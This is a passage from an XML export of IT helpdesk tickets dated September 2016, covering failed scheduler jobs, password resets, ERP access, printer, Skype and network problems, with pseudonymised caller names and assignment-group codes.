    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1336 failed in job_scheduler at: 09/17/2016 17:43:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job bwdpmbkp failed in job_scheduler at: 09/17/2016 14:48:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bwdpmbkp failed in job_scheduler at: 09/17/2016 14:48:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_3194 failed in job_scheduler at: 09/17/2016 14:10:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3194 failed in job_scheduler at: 09/17/2016 14:10:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="received call from , music was playing but no one was awswering."/>
    <s v="received call  music was playing but no one was answering._x000d__x000a__x000d__x000a_ interaction id : 2064305748"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1429 failed in job_scheduler at: 09/17/2016 11:43:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1429 failed in job_scheduler at: 09/17/2016 11:43:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job bkwin_ms_cluster_full failed in job_scheduler at: 09/17/2016 11:16:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_ms_cluster_full failed in job_scheduler at: 09/17/2016 11:16:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1422 failed in job_scheduler at: 09/17/2016 10:56:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1422 failed in job_scheduler at: 09/17/2016 10:56:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="password reset : password_management_tool passwordmanager"/>
    <s v="password reset : password_management_tool passwordmanager"/>
    <s v="awsqjfkm dejmuhlg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1318 failed in job_scheduler at: 09/17/2016 10:45:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1318 failed in job_scheduler at: 09/17/2016 10:45:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="account of thomafghk is disabled"/>
    <s v="account of thomafghk is disabled"/>
    <s v="ustvaifg hmzfewks"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activation "/>
    <s v="mobile device activation "/>
    <s v="hzagqxbf fckwrsdq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activation : company provided"/>
    <s v="mobile device activation : company provided"/>
    <s v="nsoikcyf jhybqael"/>
    <x v="0"/>
  </r>
  <r>
    <s v="fwd: die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom admin"/>
    <s v="_x000d__x000a__x000d__x000a_received from: nsoikcyf.jhybqael@gmail.com_x000d__x000a__x000d__x000a_bitte um die freischaltung des neuen handy_x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="nsoikcyf jhybqael"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset alert from o365"/>
    <s v="password reset alert from o365"/>
    <s v="ocgkpayl tzadqijk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2041 failed in job_scheduler at: 09/17/2016 05:44:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2041 failed in job_scheduler at: 09/17/2016 05:44:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="cannot submit engineering_tool to system"/>
    <s v="when trying submit engineering_tool to system have problem, the message error is &quot;not connected with company network&quot;._x000d__x000a_i think i'm already connect with vpn company but if try to submit still get failed. please advise"/>
    <s v="hbodpniz jvqpxohl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to submit reports in engineering_tool "/>
    <s v="not able to submit reports in engineering_tool _x000a_contact # :"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_894 : volume: c:\ label:sys-HostName_894 28385a7b  is over 85% space consumed. space available: 4.1 g"/>
    <s v="HostName_894 : volume: c:\ label:sys-HostName_894 28385a7b  is over 85% space consumed. space available: 4.1 g_x000d__x000a_"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="38"/>
  </r>
  <r>
    <s v="kein internetsignal"/>
    <s v="from: itjzudor ybtmorxp _x000a_sent: saturday, september 17, 2016 9:53 am_x000a_to: ecwtrjnq jpecxuty_x000a_cc: nwfodmhc exurcwkm_x000a_subject: *** sehr wichtig*** kein internetsignal_x000a_importance: high_x000a__x000a_hallo hartghymutg,_x000a__x000a_meine internetleitung geht mal wieder nicht._x000a__x000a_anschluss _x000a__x000a_kein signal eingang, kein w-lan._x000a__x000a_wo kann ich anrufen, bzw. wer unterstÃ¼tzt mich ?_x000a__x000a_danke fÃ¼r deine info._x000a__x000a_mit freundlichen grÃ¼ÃŸen | best "/>
    <s v="itjzudor ybtmorxp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1329 failed in job_scheduler at: 09/17/2016 03:13:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1329 failed in job_scheduler at: 09/17/2016 03:13:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job HostName_1019fail failed in job_scheduler at: 09/17/2016 03:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019fail failed in job_scheduler at: 09/17/2016 03:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_303 failed in job_scheduler at: 09/17/2016 03:01:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_303 failed in job_scheduler at: 09/17/2016 03:01:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="skype not working"/>
    <s v="_x000a_name:ganedsght_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:plznsryi.ikugwqec@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:skype not working_x000a_"/>
    <s v="ruhvqcwz kdqzlijw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="all servrs in  job_scheduler are unlinked"/>
    <s v="all serves in  job_scheduler are unlinked._x000d__x000a_not responding while trying to reconnect."/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="46"/>
  </r>
  <r>
    <s v="HostName_170- swap space on:HostName_170 is 75% or less"/>
    <s v="HostName_170- swap space on:HostName_170 is 75% or less"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="46"/>
  </r>
  <r>
    <s v="unable to login to  engineering tool "/>
    <s v="unable to login to  engineering tool "/>
    <s v="gxaudkip pgkuwtlv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="production_order_interface_app server down in india. not able to release production orders"/>
    <s v="production_order_interface_app server down in india. not able to release production orders."/>
    <s v="avurmegj pxgmjynu"/>
    <x v="13"/>
  </r>
  <r>
    <s v="error message during route card release"/>
    <s v="_x000a__x000a_received from: phqwmniy.kjucgqom@gmail.com_x000a__x000a_hello,_x000a__x000a_while route card release error message appearing  and route card not get printed:_x000a_[cid:image003.jpg@01SID_350c5.267b6b30]_x000a__x000a_required help in resolving the issue,_x000a_[cid:image004.png@01SID_350c5.267b6b30]_x000a__x000a_p please do not print this email unless it is absolutely necessary. spread environmental awareness._x000a__x000a_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
    <s v="phqwmniy kjucgqom"/>
    <x v="13"/>
  </r>
  <r>
    <s v="unable to login to engineering tool "/>
    <s v="unable to login to engineering tool "/>
    <s v="lygdcfwn sqmebjtf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="po print out."/>
    <s v="_x000a__x000a_received from: wimozrdc.iodvtuaz@gmail.com_x000a__x000a_hello ,_x000a__x000a_please refer the screen shot below. we are not getting po prints. please do the needful._x000a__x000a_[cid:image001.png@01SID_350c2.20eb5840]_x000a__x000a_thanking you,_x000a__x000a_srinifghvahs.s._x000a__x000a_wimozrdc.iodvtuaz@gmail.com&lt;mailto:wimozrdc.iodvtuaz@gmail.com&gt;_x000a__x000a_www.company.com&lt;_x000a__x000a__x000a__x000a__x000a_"/>
    <s v="wimozrdc iodvtuaz"/>
    <x v="13"/>
  </r>
  <r>
    <s v="job Job_549 failed in job_scheduler at: 09/16/2016 23:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_549 failed in job_scheduler at: 09/16/2016 23:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_39hoti failed in job_scheduler at: 09/16/2016 18:09:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_39hoti failed in job_scheduler at: 09/16/2016 18:09:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>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lyfrphmz ahidnfmb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_861120"/>
    <s v="ticket update on inplant_861120"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset on hr_tool and mii "/>
    <s v="password reset on hr_tool and mii "/>
    <s v="dycmlejx iycsvhzl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to get the crm add-in on excel "/>
    <s v="unable to get the crm add-in on excel "/>
    <s v="ymorvuwg pejkzvfl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset to login to collaboration_platform and check paystub"/>
    <s v="password reset to login to collaboration_platform and check paystub"/>
    <s v="vgnpzxbc rbphwimj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user wants to download software shared with him from collaboration_platform."/>
    <s v="user wants to download software shared with him from collaboration_platform._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-help the user download the software on the local system._x000d__x000a_-issue resolved."/>
    <s v="kvrmnuix yicpojmf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the correct delivery dates are not showing on the schedule lines and the output"/>
    <s v="so# 35035632 is set up to ship 2nd day air which would be 9/20/16; however, erp is showing a delivery date of 9/21 (3 days)._x000d__x000a_quote 3116244166 was entered with next day air shipping.  the delivery date should be 9/16/16, but it is 9/20/16._x000d__x000a_quote 3116230798 was entered with next day air shipping.  the delivery date should be 9/13/16, but it is 9/19/16."/>
    <s v="lkecfram tweaokch"/>
    <x v="17"/>
  </r>
  <r>
    <s v="phone issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kxsceyzo.naokumlb@gmail.com_x000d__x000a__x000d__x000a_i have a user that decided that she need to have her office turned 180 degrees. this means her phone is in another port. i managed to get it powered by using a poe injector. but currently her phone won't sync. her extension is 1223 and the mac address is 00.04.f2.d5.5b.aa._x000d__x000a__x000d__x000a_"/>
    <s v="kxsceyzo naokumlb"/>
    <x v="3"/>
  </r>
  <r>
    <s v="erp log in"/>
    <s v="_x000a__x000a_received from: idkfgcnq.vjwhmzor@gmail.com_x000a__x000a_can you please unlock my erp. my password was not working after i changed it._x000a__x000a_vyjmlain hvjbmdgi_x000a_senior technical service rep_x000a_inside-sales@company.com&lt;mailto:inside-sales@company.com&gt;_x000a__x000a__x000a__x000a_"/>
    <s v="idkfgcnq vjwhmzor"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log in to erp "/>
    <s v="unable to log in to erp "/>
    <s v="nlrwqeti qarixwbv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erro programdntya docad - rj"/>
    <s v="user: olghiveii_x000a__x000a_erro ao acessar programdntya docad:_x000a__x000a_&quot;unavailable database&quot;"/>
    <s v="lokiwfhg udkoqrcg"/>
    <x v="62"/>
  </r>
  <r>
    <s v="slight change to desktop"/>
    <s v="_x000d__x000a__x000d__x000a_received from: crkdjbot.qiztrxne@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_is there a way to remove this information from my desktop screen?_x000d__x000a__x000d__x000a_"/>
    <s v="crkdjbot qiztrxne"/>
    <x v="0"/>
  </r>
  <r>
    <s v="call from vitalyst : opportunities are not editable "/>
    <s v="call from vitalyst : opportunities are not editable_x000d__x000a_check screen shot._x000d__x000a__x000d__x000a_so we are required to use and enter our customer, lead and opportstorage_product data into crm. we understand, but when we do this, many times the actual data entry fields are locked to us, we cannot enter anything. also the flow of the screen and the lack of any intuitive input is very much challenging! _x000d__x000a_this is true on the opportstorage_product screens, also the lead screens, etc.  "/>
    <s v="tmopbken ibzougsd"/>
    <x v="22"/>
  </r>
  <r>
    <s v="laptop _ screen problem."/>
    <s v="_x000a__x000a_received from: rohjghit.kumghtwar@company.com_x000a__x000a_dear it team ,_x000a__x000a_i am face problem in my laptop screen, there is vertical line strips are coming on screen from today .  refer below pic.._x000a__x000a_earlier also i was facing this problem but it was not permanent but from today its continue on screen. kindly look into itâ€¦_x000a__x000a_[cid:image001.jpg@01SID_3506f.3653c6c0]_x000a__x000a_rohjghit kumghtwar_x000a_application engineering_x000a_rohjghit.kumghtwar@company.com&lt;mailto:rohjghit.kumghtwar@company.com&gt;_x000a__x000a__x000a__x000a__x000a_"/>
    <s v="tgseqfni ehlabdtf"/>
    <x v="18"/>
  </r>
  <r>
    <s v="admin access"/>
    <s v="need the administrator access for user  vijghyduhprga yeghrrajghodu  to install the dac software"/>
    <s v="bozdftwx smylqejw"/>
    <x v="18"/>
  </r>
  <r>
    <s v="the interface ethernet13/5(port-channel to fluke trueview appliance) on '28.70.69.134'intermittenly going down."/>
    <s v="the interface ethernet13/5(port-channel to fluke trueview appliance) on '28.70.69.134'(company-dc-nx7018.company.com) is going down intermittently._x000d__x000a_"/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="9401555132 &amp; 0512667163 vat not tally"/>
    <s v="from: raghyvhdra najuty _x000a_sent: friday, september 16, 2016 4:50 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: srinfhyath araghtyu; parthyrubhji erathyur; hdfvbjoe obvrxtya; raghjkavhjkdra rao_x000a_subject: dan - re: 0512666243 &amp; 0512667163 vat not tally_x000a__x000a_please refer    below mail  which mentions  that  vat does not tally in the inwarehouse_tools no.0512666243 dated:-16/08/2016 and inwarehouse_tool no.0512667163 dated:-18/08/2016_x000a__x000a_i had raised similar ticket   last  week for some other  inwarehouse_tools  .  we are  coming across  such  issues  frequently and  request you  to ensure  that   this type of error  is not repeated  ._x000a__x000a__x000a_"/>
    <s v="ikerxqwz prkyuitl"/>
    <x v="9"/>
  </r>
  <r>
    <s v="can you please check the bobj account of stefdgthy. he gets the enclosed error message when trying to open a bobj report"/>
    <s v="dear all,_x000d__x000a__x000d__x000a_can you please check the bobj account of wohzmlib fxwjhapo. he gets the enclosed error message when trying to open a bobj report._x000d__x000a__x000d__x000a_"/>
    <s v="wohzmlib fxwjhapo"/>
    <x v="8"/>
  </r>
  <r>
    <s v="one note issue : file not getting synched."/>
    <s v="one note issue : file not getting synched._x000d__x000a_logged out and trying logging in back, no go._x000d__x000a_checked if other user are able to sync , no issues with other users."/>
    <s v="orvwshat acpgvixj"/>
    <x v="15"/>
  </r>
  <r>
    <s v="printer not printing"/>
    <s v="name:ljztkmds ltjkirwy_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:ljztkmds.ltjkirwy@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:cannot access printers in the usa plant. acts like i need to install driver, but then does not give me access to HostName_837.never had issues in the past. not sure if permissions changed when changes positions."/>
    <s v="ljztkmds ltjkirwy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="change mm packages from plant_248 bom's"/>
    <s v="hi team_x000d__x000a__x000d__x000a_we need the items related below, must be replaced for the new packages filled in the plant_248 bom's_x000d__x000a_._x000d__x000a_current 6092194 - change by 7309918_x000d__x000a_current 6092195 - change by 7309918_x000d__x000a_current 6092196 - change by 7309919_x000d__x000a_current 6092197 - change by 7309910_x000d__x000a_current 6092101 - change by 7309910_x000d__x000a_._x000d__x000a_"/>
    <s v="zuyimtsf qjtimdsp"/>
    <x v="44"/>
  </r>
  <r>
    <s v="unable to get audio on skype meeting "/>
    <s v="unable to get audio on skype meeting "/>
    <s v="ijplstng juybetlo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="entering power save mode : external monitor"/>
    <s v="entering power save mode : external monitor"/>
    <s v="ixefmkyb bkyfisxz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="stop hr jobs"/>
    <s v="hi tim,_x000d__x000a__x000d__x000a_please stop the attached hr jobs with immediate effect._x000d__x000a_hr160_x000d__x000a_hr180_x000d__x000a__x000d__x000a_"/>
    <s v="qcehailo wqynckxg"/>
    <x v="4"/>
  </r>
  <r>
    <s v="expense report error - manager needs authorization"/>
    <s v="_x000a__x000a_received from: ifblxjmc.dyrgfwbm@gmail.com_x000a__x000a_hello,_x000a__x000a_spqrtkew vpmnusaf needs authorization to approve expense reports for sqmabtwn fchijage.  one team is correct with sqmabtwn fchijage reporting to avigtshay.  the expense side just needs updated._x000a__x000a_below is the error he is getting._x000a__x000a_"/>
    <s v="ifblxjmc dyrgfwbm"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unable to login to ethics"/>
    <s v="when trying to login to ethics, user gets the following error_x000d__x000a__x000d__x000a_welcome to the company business ethics &amp; conduct center_x000d__x000a_(ethics) training site. our records indicate that the log-in_x000d__x000a_credentials you used to access this site from the company's_x000d__x000a_collaboration_platform do not match the records we have on file within the_x000d__x000a_active directory. please submit a ticket to the global support_x000d__x000a_center to ensure that your network log-in id is correctly entered_x000d__x000a_"/>
    <s v="uwiqchfp hnsukjma"/>
    <x v="23"/>
  </r>
  <r>
    <s v="install aiqjxhuv dceghpwn viewer "/>
    <s v="install aiqjxhuv dceghpwn viewer ._x000d__x000a_._x000d__x000a_software available at p:\ drive in the \temporary\aiqjxhuv dceghpwn viewer subdirectory.   "/>
    <s v="zuyimtsf qjtimdsp"/>
    <x v="62"/>
  </r>
  <r>
    <s v="urgent request to complete your requirement          fy17 q1  ethics module - working together:  promoting mutual respect"/>
    <s v="hello,_x000d__x000a__x000d__x000a_please advise, undeliverable e-mail.  is this person still with company?_x000d__x000a__x000d__x000a_"/>
    <s v="crkdjbot qiztrxne"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1967b failed in job_scheduler at: 09/16/2016 10:59:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1967b failed in job_scheduler at: 09/16/2016 10:59:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="not able to lopgin to collaboration_platform using email address."/>
    <s v="not able to login to collaboration_platform using email address._x000d__x000a_changes settings in extension attribute editor15 and asked user to login after some time"/>
    <s v="alfqhigv zofjibkr"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" ship-to # 81051078 created / not visible in erp"/>
    <s v="from:  customermaster _x000a_sent: friday, september 16, 2016 7:14 pm_x000a_to: repyzajo lxfwopyq;  customermaster; nwfodmhc exurcwkm_x000a_cc: fctmzhyk cznlfbom_x000a_subject: amar re: ship-to # 81051078 created / not visible in erp_x000a_importance: high_x000a__x000a_it,_x000a_ship to account # 81051078 was created in crm over 3 hrs ago and is still not visible in ecc (SID_34).  all required fields are completed.  please advise why this account has not replicated to SID_34.  this account is needed for additional actions!!_x000a__x000a_nkthumgf mwgdenbs_x000a_nkthumgf.mwgdenbs@gmail.com_x000a_ph: _x000a__x000a_from: repyzajo lxfwopyq _x000a_sent: friday, september 16, 2016 6:44 am_x000a_to:  customermaster_x000a_cc: fctmzhyk cznlfbom_x000a_subject: ship-to # 81051078 created / not visible in erp_x000a_importance: high_x000a__x000a_hello customer master team,_x000a__x000a_we have created a new ship-to address # 81051078 for the sold-to #81034820 under 1278/01/03. _x000a_the account is set up correctly and visible in crm, but after few hours it is still not visible in erp._x000a__x000a_could you please help ?_x000a__x000a__x000a_best "/>
    <s v="nkthumgf mwgdenbs"/>
    <x v="14"/>
  </r>
  <r>
    <s v="solicito a instalaÃ§Ã£o de software adobe acrobat"/>
    <s v="solicito a instalaÃ§Ã£o do software adobe acrobat para a manutenÃ§Ã£o e criaÃ§Ã£o de documentos diversos como, importaÃ§Ã£o e exportaÃ§Ã£o."/>
    <s v="vhjkdqop tkhafgrc"/>
    <x v="62"/>
  </r>
  <r>
    <s v="analysis for office - hana - access (1 user out of 3 without access to hana)"/>
    <s v="_x000d__x000a__x000d__x000a_received from: uzpycdho.hdswinlo@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_within the european pricing team we are experiencing for some users troubles in getting the right connection to business explorer hana._x000d__x000a__x000d__x000a_you will receive a couple of tickets in showing what the error / behavior is and hope for you a quick resolution from you._x000d__x000a__x000d__x000a_user: uylvgtfi eovkxgpn, germany location_x000d__x000a__x000d__x000a_attachment:_x000d__x000a_set of instruction we are using_x000d__x000a_error log_x000d__x000a_and screenshot below._x000d__x000a__x000d__x000a_setup of the machine has been completed through local it._x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="uzpycdho hdswinlo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vendor and customer balance in local currency list(sÂ­_alr_98123193 and s_alr_98123283)"/>
    <s v="help desk,_x000d__x000a__x000d__x000a_in fy2017, the end of month balance in s_alr_98123193 is different from the trial balance in f.01. _x000d__x000a_previous month end of balance is zero in s_alr_98123193._x000d__x000a__x000d__x000a_under the same conditions in fy2016, previous month end of balance appear._x000d__x000a_and the end of month balance match between  s_alr_98123193 and f.01._x000d__x000a__x000d__x000a_what is the cause?_x000d__x000a_"/>
    <s v="zsqabokr xbtsaodr"/>
    <x v="9"/>
  </r>
  <r>
    <s v="erp access issue : passward re-set for SID_4"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_4_x000a__x000a_enter user id of user having the issue: arrojhsjd_x000a__x000a_transaction code(s) the user needs or was working with:_x000a__x000a_describe the issue:_x000a__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000a__x000a_provide access the same as this other user:"/>
    <s v="zbmhdaru zhaupwno"/>
    <x v="19"/>
  </r>
  <r>
    <s v="wireless is not working."/>
    <s v="wireless is not working."/>
    <s v="rbzymfvx lebqthwv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account locked."/>
    <s v="erp SID_34 account locked."/>
    <s v="htoqbljx dkbatgus"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need access to shop_floor_app corrected"/>
    <s v="i don't have the access to update work centers in shop_floor_app.  i don't have access to the system tab in shop_floor_app.  it looks like i am missing some items"/>
    <s v="chkmejsn lvidgknc"/>
    <x v="42"/>
  </r>
  <r>
    <s v="virus issue /google maps issue "/>
    <s v="virus issue /google maps issue "/>
    <s v="ieybdzvf spxekdic"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to install engineering_tool"/>
    <s v="unable to install engineering_tool"/>
    <s v="ewvugfcy nxbdajgh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to skype"/>
    <s v="unable to login to skype"/>
    <s v="ptljghyk qhtvlrxe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="johghajknn needed information about passwords."/>
    <s v="johghajknn needed information about passwords."/>
    <s v="zgirlxwp kmeaylhi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to launch engineering tool"/>
    <s v="name:stefyty hipghkinjyt_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:zikuvsat.spxycizr@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:engineering tool has failed to load. _x000a_error log available, but too large to paste here."/>
    <s v="zikuvsat spxycizr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unlocked account"/>
    <s v="unlocked account"/>
    <s v="ujbaemlc ilzhrxjo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="explanation about password manager is required."/>
    <s v="explanation about password manager is required."/>
    <s v="xkegcqov drctxjqi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to wireless."/>
    <s v="unable to connect to wireless."/>
    <s v="cjexkmoz jsikovzd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mjvfxnka zvjxuahe is not able to add campaign &quot;global hard machining&quot; to his opportunities"/>
    <s v="when user adds the above campaign to an opportstorage_product and hits save  crm delivers the error that he does not have privilages to perform this action. log file and screenshot attached. _x000d__x000a_eva_x000d__x000a_"/>
    <s v="mjvfxnka zvjxuahe"/>
    <x v="39"/>
  </r>
  <r>
    <s v="install pdfmailer \ahlqgjwx wbsfavhg"/>
    <s v="install pdfmailer \ahlqgjwx wbsfavhg"/>
    <s v="ahlqgjwx wbsfavhg"/>
    <x v="24"/>
  </r>
  <r>
    <s v="unable to connect to wifi"/>
    <s v="unable to connect to wifi"/>
    <s v="ptljghyk qhtvlrxe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password change , no outlook"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xkegcqov.drctxjqi@gmail.com_x000d__x000a__x000d__x000a_changed my password this morning now i cannot open outlook._x000d__x000a_this happened last time also, it was a crm issue that happens when password is changed._x000d__x000a__x000d__x000a_high importance_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_xkegcqov drctxjqi_x000d__x000a_ application engineer - cmp_x000d__x000a_industrial segment_x000d__x000a_xkegcqov.drctxjqi@gmail.com_x000d__x000a_m 1-229-300-4142_x000d__x000a_t 1-800-446-7738_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="xkegcqov drctxjqi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="installl bex analysis add in"/>
    <s v="installl bex analysis add in"/>
    <s v="jfgkmauh wfrgkejq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="laptop battery needs to replaced aerp:service tag:dd9p882"/>
    <s v="my laptop battery needs to be replaced aerp. battery backup is very poor  laptop is powering off when i remove it from docking station._x000d__x000a_service tag:dd9p882_x000d__x000a_laptop model:dell latitude e5450"/>
    <s v="jloygrwh acvztedi"/>
    <x v="18"/>
  </r>
  <r>
    <s v="no 'originals' for dir71805607 - manufacturing waiting"/>
    <s v="there have been no 'original' files created for dir71805607.  it is fr.  production is on hold waiting for these files."/>
    <s v="irpvzhym kayqlbuh"/>
    <x v="45"/>
  </r>
  <r>
    <s v="an der maschine 15 (agathon combi) funktioniert die netzwerkverbindung nicht"/>
    <s v="hallo _x000d__x000a__x000d__x000a_an der maschine 15 (agathon combi) funktioniert die netzwerkverbindung nicht._x000d__x000a_kannst du bitte einmal nachschauen?_x000d__x000a__x000d__x000a_danke_x000d__x000a__x000d__x000a_gruÃŸ_x000d__x000a_                marftgytin_x000d__x000a_"/>
    <s v="vfuytnwp fyzhntag"/>
    <x v="24"/>
  </r>
  <r>
    <s v="unable to install engineering_tools"/>
    <s v="unable to install engineering_tools. _x000a__x000a_t +"/>
    <s v="jzksvdtb czvlsmqx"/>
    <x v="25"/>
  </r>
  <r>
    <s v="inc1551048 - ticket update"/>
    <s v="inc1551048 - ticket update"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype audio issue"/>
    <s v="other person unable hear my warehouse_tool on skype call."/>
    <s v="hkfipags sdilxrfk"/>
    <x v="18"/>
  </r>
  <r>
    <s v="space requirement in grinding drive"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vkzwibco.pueyvhoi@gmail.com_x000d__x000a__x000d__x000a_dear sir/madam,_x000d__x000a__x000d__x000a_the space available in grinding drive is only 791 mb. please provide additional space in the drive at the earliest._x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35033.4c7cf5c0]_x000d__x000a__x000d__x000a_"/>
    <s v="vkzwibco pueyvhoi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="network outage:india - india ():vpn circuit is down since at 5:49 am et on 09/16.no backup"/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _____5:49 am et on 09/16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na______     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  __email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3"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="proygkjt mwetuhqf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need telephony_software to be installed on ebhl8111136 - xwgnvksi dwijxgob - urgent csr cannot take calls"/>
    <s v="need telephony_software to be installed on ebhl8111136 - xwgnvksi dwijxgob_x000a__x000a_please contact karghyuen via skype for remote installation_x000a__x000a_(zmgsfner caltmgoe - phone: )"/>
    <s v="zmgsfner caltmgoe"/>
    <x v="32"/>
  </r>
  <r>
    <s v="call to check if hybegvwo dbgrtqhs account is disabled"/>
    <s v="call to check if hybegvwo dbgrtqhs account is disabled"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="re: revised prices - local"/>
